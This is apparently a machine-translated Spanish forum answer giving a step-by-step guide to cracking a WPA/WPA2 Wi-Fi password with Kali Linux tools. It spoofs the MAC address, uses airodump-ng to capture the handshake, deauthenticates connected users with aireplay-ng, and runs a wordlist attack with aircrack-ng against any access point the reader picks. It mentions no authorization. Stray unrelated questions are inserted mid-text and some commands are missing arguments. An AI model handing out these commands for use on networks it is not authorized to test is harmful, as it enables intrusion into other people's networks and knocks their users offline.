Antes de responder: Backtrack ahora es Kali Linux, descárgalo cuando tengas algo de tiempo libre.
Prerrequisitos:
- Kali / back track Linux, que por defecto tendrá todas las herramientas necesarias para descargar lo que desea.
- Una máquina virtual o una computadora portátil que puede usar para arrancar el BT o Kali
- Una tarjeta de red compatible. La tarjeta de red debe admitir la inyección de paquetes si desea hacerlo rápido; de lo contrario, tendrá que esperar un tiempo para que alguien se desconecte y vuelva a conectarse al punto de acceso.
Frases importantes para saber:
- ¿El wifi público es realmente gratuito?
- ¿Qué es mejor, un punto de acceso 4G o WiFi de banda ancha?
- Cómo usar mi PC como un punto de acceso Wi-Fi privado
- ¿Quién es el jefe de marketing del punto de acceso de especias?
- ¿Es posible cubrir una señal directa de 7 km con un punto de acceso WiFi para dispositivos móviles, iPad y computadoras portátiles?
La dirección MAC (dirección de control de acceso a medios) es un identificador único asignado a las interfaces de red para las comunicaciones en el segmento físico de la red.
WAP (punto de acceso inalámbrico) es un dispositivo que permite que los dispositivos inalámbricos se conecten a una red cableada mediante Wi-Fi
BSSID (Identificación de conjunto de servicios básicos) es la dirección MAC del WAP
ESSID (Identificación de conjunto de servicio extendido) es el nombre para mostrar de la red inalámbrica
WPA / WPA2 (Acceso protegido Wi-Fi / Acceso protegido Wi-Fi II) son dos protocolos de seguridad y programas de certificación de seguridad desarrollados por Wi-Fi Alliance para proteger las redes inalámbricas de computadoras.
PSK (clave precompartida) es el término para la contraseña definida en las redes encriptadas WPA / WPA2.
PASO 1: Cambiar su dirección MAC:
- En Kali / BT abra la terminal.
- comando: ifconfig
- Esto debería enumerar todos los adaptadores de red en su sistema, incluido el inalámbrico, que debería llamarse algo así como: Wlanx {wlan0, wlan1 ….}
- Apague su tarjeta de red con el comando: ifconfig wlan0 down
Nota: cambie wlan0 a lo que dijo en el comando anterior. - comando: macchanger -m 00: 11: 22: 33: 44: 55
Esto cambiará la dirección MAC de su dispositivo temporalmente - Vuelva a encender el dispositivo: ifconfig wlan0 up
PASO 2: Cree una interfaz de monitoreo virtual.
Para escuchar las señales que maneja wlan0, crearemos una interfaz virtual que nos ayudará a monitorear y manejar lo que wlan0 está enviando y recibiendo.
- Comando: airmon-ng start wlan0
- Esto creará una nueva interfaz de monitor llamada mon0
PASO 3 : Comience el ataque monitoreando el tráfico inalámbrico
- Comando: airodump-ng mon0
Esto enumerará todos los AP activos y su BSSID y otros detalles. También debajo de la lista verá la lista de estaciones de computadora conectadas a cualquiera de estos AP. - Anote el BSSID y el canal que está utilizando (CH en la salida) del AP que desea golpear
- Presione Ctrl + c para finalizar el monitoreo.
PASO 4: Bloquee el AP necesario.
Esto apuntará a la comunicación desde el punto de acceso que desea y comenzará a escribir información no recopilada en un archivo que necesita piratear.
Lo que esperamos capturar es la información del protocolo de enlace de 4 vías que los sistemas usan para autenticar, esta información puede usarse para descifrar la contraseña utilizada.
- Comando: airodump-ng –bssid -c 4 -w dumpfilename mon0
Las partes subrayadas deben cambiarse según los datos que tenga. dumpfilename se puede reemplazar con anyhting. - Esto comenzará a monitorear el punto de acceso y le mostrará las estaciones conectadas a él también. Debe escribir el BSSID de cualquiera de las estaciones para poder engañarlo para que se desconecte y vuelva a conectar.
PASO 5: Capturando paquetes de autenticación
Nota: Esto solo funcionará si su tarjeta de red es compatible con la inyección de paquetes; de lo contrario, tendrá que esperar hasta que la persona se desconecte y vuelva a conectarse.
- Abrir nueva terminal y dar comando:
aireplay-ng -0 30 -a mon0
Esto enviará 30 solicitudes de desconexión a la computadora, lo que hará que intente volver a conectarse al punto de acceso. - Si muestra algún error o parece que no funciona, probablemente sea el problema con la tarjeta de red y deberá esperar hasta que el usuario se vuelva a conectar por sí mismo.
- Una vez que ocurre la reconexión, puede verla en el terminal Airmon que está monitoreando los paquetes. Se debe mostrar una alerta en la esquina superior derecha.
Presiona ctrl + c y sal de él. Es hora de descifrar la contraseña.
PASO 6: descifrando la contraseña
- Necesita un archivo de lista de contraseñas que se pueda descargar de Internet. Simplemente busque “lista de palabras” o “lista de contraseñas” para obtener archivos con millones de palabras y algunas tan grandes como 1GB a 10Gb. Más palabras en él, mejor.
- Obtenga y extraiga el archivo de lista de palabras en su carpeta de inicio.
- Ejecute el comando:
aircrack-ng -w wordlist.lst -b dumpfilename * .cap - Reemplace el subrayado con los detalles correctos.
PASO 7: espera
- Espere un poco mientras su computadora hace el trabajo sucio de descifrar la contraseña. Debería tener la contraseña en su pantalla pronto.
Felices hazañas.